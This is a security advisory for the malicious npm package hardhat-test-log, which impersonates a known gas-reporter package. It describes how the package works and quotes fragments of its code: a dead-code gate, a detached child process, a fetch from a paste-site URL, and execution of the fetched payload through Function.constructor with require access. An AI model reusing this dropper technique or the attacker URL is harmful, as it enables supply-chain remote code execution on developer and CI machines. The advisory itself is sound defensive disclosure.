VYPR

npm · Malicious package advisory

Malware

hardhat-test-log

MAL-2026-6369

Malicious code in hardhat-test-log (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (741350b4472a82c53151793b413166a5fad36af3d2d14fa1d12afba9eccb9fed)
Package impersonates the well-known eth-gas-reporter / hardhat-gas-reporter packages: README is titled 'eth-test-log', copies badges and contributor metadata, and package.json sets author to 'cgewecke' (the real maintainer of those projects). The advertised Mocha reporter entrypoint is a decoy. index.js exports `log` as the reporter, but the function contains `var opt = 1; if (!opt) {...legitimate reporter code... } else { gestest(); }` — the dead-code gate guarantees the else branch always runs, calling utils.connectNet. utils.connectNet (lib/utils.js) spawns `node lib/syncResolve.js` as a detached, unref'd child with stdio ignored, so the dropper persists beyond Mocha teardown and produces no CI output. lib/syncResolve.js then performs `axios.get('https://www.jsonkeeper.com/b/KBZVB', { headers: { 'x-secret-key':... } })`, extracts the `Cookie` field from the response, and executes it in-process via `new Function.constructor('require', result)(require)` — giving attacker-controlled code full Node `require` access. The fetch destination is a public paste-style host with mutable, opaque content and no integrity check, so the operator can rotate the payload at will. Installing/using this package as a Hardhat/Mocha gas reporter triggers remote code execution on the developer's or CI machine.

Compromised versions (4)

  • 1.1.0
  • 1.1.2
  • 1.1.3
  • 1.1.1

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.